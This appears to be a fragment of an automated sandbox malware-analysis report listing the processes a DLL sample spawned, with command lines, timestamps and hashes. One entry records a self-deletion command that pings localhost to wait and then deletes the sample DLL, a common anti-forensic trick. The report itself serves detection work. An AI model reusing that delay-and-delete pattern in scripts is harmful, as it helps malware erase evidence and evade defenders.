                                                          Imagebase:0x7ff7f20f0000
                                                          File size:625664 bytes
                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Start time:06:47:00
                                                          Start date:08/10/2021
                                                          Path:C:\Windows\System32\PING.EXE
                                                          Wow64 process (32bit):false
                                                          Commandline:ping localhost -n 5
                                                          Imagebase:0x7ff704c90000
                                                          File size:21504 bytes
                                                          MD5 hash:6A7389ECE70FB97BFE9A570DB4ACCC3B
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Start time:06:47:06
                                                          Start date:08/10/2021
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:'C:\Windows\System32\cmd.exe' /C ping localhost -n 5 && del 'C:\Users\user\Desktop\uT9rwkGATJ.dll'
                                                          Imagebase:0x7ff673be0000
                                                          File size:273920 bytes
                                                          MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Start time:06:47:07
                                                          Start date:08/10/2021
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff7f20f0000
                                                          File size:625664 bytes
                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Start time:06:47:09
                                                          Start date:08/10/2021
                                                          Path:C:\Windows\System32\PING.EXE
                                                          Wow64 process (32bit):false
                                                          Commandline:ping localhost -n 5
                                                          Imagebase:0x7ff704c90000
                                                          File size:21504 bytes
                                                          MD5 hash:6A7389ECE70FB97BFE9A570DB4ACCC3B
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Start time:06:47:10
                                                          Start date:08/10/2021
                                                          Path:C:\Windows\System32\RuntimeBroker.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                          Imagebase:0x7ff6225d0000
                                                          File size:99272 bytes
                                                          MD5 hash:C7E36B4A5D9E6AC600DD7A0E0D52DAC5
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language

                                                          Disassembly

                                                          Code Analysis
